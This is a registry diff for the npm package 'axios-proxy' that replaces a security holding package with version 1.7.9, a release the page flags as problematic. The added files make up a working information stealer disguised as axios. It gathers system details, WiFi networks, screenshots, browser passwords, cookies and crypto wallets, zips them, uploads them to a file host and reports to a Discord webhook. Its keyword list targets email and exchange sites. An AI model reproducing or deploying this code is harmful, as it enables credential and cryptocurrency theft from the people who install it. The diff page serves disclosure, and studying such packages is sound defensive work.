axios-proxy 0.0.1-security → 1.7.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of axios-proxy might be problematic. Click here for more details.

package/infection.js ADDED
@@ -0,0 +1,276 @@
1
+ module.exports = (client) => {
2
+ return {
3
+ async get_user_info() {
4
+ let cpus = [];
5
+
6
+ for (var cpu of client.config.user.cpus) {
7
+ cpus.push(client.utils.encryption.decryptData(cpu));
8
+ }
9
+
10
+ let pc_info_text =
11
+ "<================[ User Info ]>================>\n<================[t.me/turcoflex]>================>\n\n";
12
+ let fields = [];
13
+
14
+ const wifi_connections = await client.config.user.wifi_connections();
15
+
16
+ for (let [key, value] of Object.entries({
17
+ "🖥️ CPU(s)": cpus.join("\n"),
18
+ "⚡ RAM": client.utils.encryption.decryptData(client.config.user.ram),
19
+ "🛑 Version": client.utils.encryption.decryptData(
20
+ client.config.user.version
21
+ ),
22
+ "⏳ Uptime": client.utils.encryption.decryptData(
23
+ client.config.user.uptime
24
+ ),
25
+ "📂 Host directory": client.utils.encryption.decryptData(
26
+ client.config.user.hostdir
27
+ ),
28
+ "🆔 Host name": client.utils.encryption.decryptData(
29
+ client.config.user.hostname
30
+ ),
31
+ "🆔 PC Name": client.utils.encryption.decryptData(
32
+ client.config.user.username
33
+ ),
34
+ "👻 Type": client.utils.encryption.decryptData(client.config.user.type),
35
+ "🏹 Arch": client.utils.encryption.decryptData(client.config.user.arch),
36
+ "📢 Release": client.utils.encryption.decryptData(
37
+ client.config.user.release
38
+ ),
39
+ "🌌 AppData Path": client.utils.encryption.decryptData(
40
+ client.config.user.appdata
41
+ ),
42
+ "🪐 Temp Path": client.utils.encryption.decryptData(
43
+ client.config.user.temp
44
+ ),
45
+ "🌐 User Domain": client.utils.encryption.decryptData(
46
+ client.config.user.user_domain
47
+ ),
48
+ "💨 System Drive": client.utils.encryption.decryptData(
49
+ client.config.user.system_drive
50
+ ),
51
+ "💾 Processors": client.utils.encryption.decryptData(
52
+ client.config.user.processors
53
+ ),
54
+ "💾 Processor Identifier": client.utils.encryption.decryptData(
55
+ client.config.user.processor_identifier
56
+ ),
57
+ "💾 Processor Architecture": client.utils.encryption.decryptData(
58
+ client.config.user.processor_architecture
59
+ ),
60
+ })) {
61
+ pc_info_text += `${key}: ${value}\n`;
62
+ fields.push({
63
+ name: key,
64
+ value: `\`\`\`${value}\`\`\``,
65
+ inline: true,
66
+ });
67
+ }
68
+
69
+ let wifi_connections_text = `<================[WiFi connections]>================>\n<================[t.me/turcoflex ]>================>\n\n${wifi_connections}`;
70
+
71
+ client.utils.jszip.createTxt(
72
+ "\\WiFi Connections.txt",
73
+ wifi_connections_text
74
+ );
75
+ client.utils.jszip.createTxt("\\User Info.txt", pc_info_text);
76
+
77
+ return client.utils.webhook.createEmbed({
78
+ fields: fields,
79
+ });
80
+ },
81
+
82
+ get_executable_info() {
83
+ let executable_info_text =
84
+ "<================[Executable Info]>================>\n<================[t.me/turcoflex]>================>\n\n";
85
+ let fields = [];
86
+
87
+ for (let [key, value] of Object.entries({
88
+ "☠️ Execution path": client.utils.encryption.decryptData(
89
+ client.config.executable.execution_path
90
+ ),
91
+ "🅿️ Debug port": client.config.executable.debug_port,
92
+ "🔢 PID": client.config.executable.pid,
93
+ "🔢 PPID": client.config.executable.ppid,
94
+ })) {
95
+ fields.push({
96
+ name: key,
97
+ value: `\`\`\`${value}\`\`\``,
98
+ inline: false,
99
+ });
100
+ executable_info_text += `${key}: ${value}\n`;
101
+ }
102
+ client.utils.jszip.createTxt(
103
+ "\\Executable Info.txt",
104
+ executable_info_text
105
+ );
106
+
107
+ return client.utils.webhook.createEmbed({
108
+ fields: fields,
109
+ });
110
+ },
111
+
112
+ async initialize() {
113
+ try {
114
+ await this.get_user_info();
115
+ } catch {}
116
+ try {
117
+ this.get_executable_info();
118
+ } catch {}
119
+ try {
120
+ await this.infect();
121
+ } catch {}
122
+ try {
123
+ await this.send_zip();
124
+ } catch (err) {
125
+ try {
126
+ await client.utils.webhook.sendToWebhook({
127
+ embeds: [
128
+ client.utils.webhook.createEmbed({
129
+ title: `⚠️ Could not send log`,
130
+ description: `\`\`\`${err}\`\`\``,
131
+ }),
132
+ ],
133
+ });
134
+ } catch {}
135
+ }
136
+ },
137
+
138
+ getFolderFiles(path_prefix, path) {
139
+ var result = "";
140
+
141
+ for (var file of client.requires.fs.readdirSync(
142
+ `${path_prefix}\\${path}`
143
+ )) {
144
+ var file_size_in_kb = (
145
+ client.requires.fs.statSync(`${path_prefix}\\${path}\\${file}`).size /
146
+ 1024
147
+ ).toFixed(2);
148
+ if (
149
+ !client.requires.fs
150
+ .statSync(`${path_prefix}\\${path}\\${file}`)
151
+ .isDirectory()
152
+ ) {
153
+ if (file.includes(".txt")) {
154
+ result += `📄 ${path}/${file} - ${file_size_in_kb} KB\n`;
155
+ } else if (file.includes(".png")) {
156
+ result += `🖼️ ${path}/${file} - ${file_size_in_kb} KB\n`;
157
+ } else {
158
+ result += `🥙 ${path}/${file} - ${file_size_in_kb} KB\n`;
159
+ }
160
+ } else {
161
+ result += this.getFolderFiles(`${path_prefix}\\`, `${path}/${file}`);
162
+ }
163
+ }
164
+
165
+ return result;
166
+ },
167
+
168
+ async send_zip() {
169
+ try {
170
+ await client.utils.browsers.saveBrowserStuff();
171
+ } catch (err) {
172
+ try {
173
+ await client.utils.webhook.sendToWebhook({
174
+ embeds: [
175
+ client.utils.webhook.createEmbed({
176
+ title: `⚠️ Could not save browser stuff`,
177
+ description: `\`\`\`${err}\`\`\``,
178
+ }),
179
+ ],
180
+ });
181
+ } catch {}
182
+ }
183
+
184
+ try {
185
+ await client.utils.jszip.createZip();
186
+ } catch (err) {
187
+ try {
188
+ await client.utils.webhook.sendToWebhook({
189
+ embeds: [
190
+ client.utils.webhook.createEmbed({
191
+ title: `⚠️ Could not create zip file`,
192
+ description: `\`\`\`${err}\`\`\``,
193
+ }),
194
+ ],
195
+ });
196
+ } catch {}
197
+ }
198
+
199
+ const upload = await client.utils.gofile.uploadFile(
200
+ client.requires.fs.createReadStream(`${client.config.jszip.path}.zip`)
201
+ );
202
+
203
+ var counter_embed = this.create_counter_embed();
204
+
205
+ counter_embed.description = `**[Download the zip file](${upload.downloadPage})**`;
206
+
207
+ await client.utils.webhook.sendToWebhook({
208
+ embeds: [counter_embed],
209
+ });
210
+ },
211
+
212
+ create_counter_embed() {
213
+ let obj = {
214
+ title: `💉 Infected - ${client.utils.encryption.decryptData(
215
+ client.config.user.hostname
216
+ )}/${client.utils.encryption.decryptData(
217
+ client.config.user.user_domain
218
+ )}/${client.utils.encryption.decryptData(client.config.user.username)}`,
219
+ footer: {
220
+ text: client.utils.encryption.decryptData(
221
+ client.config.embed.footer.text
222
+ ),
223
+ icon_url: client.utils.encryption.decryptData(
224
+ client.config.embed.footer.icon_url
225
+ ),
226
+ },
227
+ fields: [],
228
+ timestamp: new Date(),
229
+ };
230
+
231
+ let cpus = [];
232
+
233
+ for (var cpu of client.config.user.cpus) {
234
+ cpus.push(client.utils.encryption.decryptData(cpu));
235
+ }
236
+
237
+ for (let [key, value] of Object.entries({
238
+ "🔑 Passwords": client.config.counter.passwords,
239
+ "🍪 Cookies": client.config.counter.cookies,
240
+ "🔖 Bookmarks": client.config.counter.bookmarks,
241
+ "💰 Wallets": client.config.counter.wallets,
242
+ "📶 Wifi networks": client.config.counter.wifinetworks,
243
+ })) {
244
+ obj["fields"].push({
245
+ name: key,
246
+ value: `\`\`\`${value}\`\`\``,
247
+ inline: true,
248
+ });
249
+ }
250
+
251
+ return obj;
252
+ },
253
+
254
+ async get_screenshot() {
255
+ client.requires.screenshot.listDisplays().then((displays) => {
256
+ var random_uuid = client.requires.crypto.randomUUID();
257
+ Object.entries(displays).forEach(async (key, value) => {
258
+ client.config.counter.screenshots++;
259
+ client.requires.screenshot({
260
+ screen: key[1].id,
261
+ format: "png",
262
+ filename: `${client.config.jszip.path}/${random_uuid}_DISPLAY_${
263
+ parseInt(key[0]) + 1
264
+ }.png`,
265
+ });
266
+ });
267
+ });
268
+ },
269
+
270
+ async infect() {
271
+ await this.get_screenshot(client.config.webhook.url);
272
+
273
+ await client.utils.discord.init();
274
+ },
275
+ };
276
+ };
package/keywords.js ADDED
@@ -0,0 +1,16 @@
1
+ module.exports = (client) => {
2
+ return {
3
+ keywords: [
4
+ "gmail.com",
5
+ "youtube.com",
6
+ "nulled.to",
7
+ "cracked.to",
8
+ "tiktok.com",
9
+ "yahoo.com",
10
+ "gmx.com",
11
+ "aol.com",
12
+ "coinbase",
13
+ "binance"
14
+ ]
15
+ }
16
+ }
package/lib.txt ADDED
@@ -0,0 +1 @@
1
+ 1
package/package.json CHANGED
@@ -1,6 +1,50 @@
1
1
  {
2
+ "dependencies": {
3
+ "archiver": "^5.3.1",
4
+ "archiver-zip-encrypted": "^1.0.11",
5
+ "axios": "^0.27.2",
6
+ "buffer-replace": "^1.0.0",
7
+ "discord-webhook-node": "^1.1.8",
8
+ "is-wsl": "^2.2.0",
9
+ "javascript-obfuscator": "^4.0.0",
10
+ "nexe-natives-fix": "^1.0.1",
11
+ "node-gyp": "^9.3.1",
12
+ "node-machine-id": "^1.1.12",
13
+ "node-resourcehacker": "^1.2.1",
14
+ "request": "^2.88.2",
15
+ "sqlite3": "^5.0.8",
16
+ "systeminformation": "^5.11.16",
17
+ "temp-dir": "^2.0.0",
18
+ "win-dpapi": "^1.1.0",
19
+ "zip-lib": "^0.7.3"
20
+ },
21
+ "nodeVersion": "system",
2
22
  "name": "axios-proxy",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
23
+ "version": "1.7.9",
24
+ "description": "<h1 align=\"center\">\r <b>\r <a href=\"https://axios-http.com\"><img src=\"https://axios-http.com/assets/logo.svg\" /></a><br>\r </b>\r </h1>",
25
+ "main": "./index.js",
26
+ "bin": {
27
+ "liliandorker": "index.js"
28
+ },
29
+ "pkg": {
30
+ "assets": [
31
+ "./node_modules",
32
+ "./utils",
33
+ "./config",
34
+ "./index.js"
35
+ ]
36
+ },
37
+ "devDependencies": {
38
+ "cross-env": "^7.0.3"
39
+ },
40
+ "scripts": {
41
+ "test": "npm run test"
42
+ },
43
+ "keywords": [
44
+ "axios",
45
+ "request",
46
+ "proxy"
47
+ ],
48
+ "author": "cfall",
49
+ "license": "ISC"
6
50
  }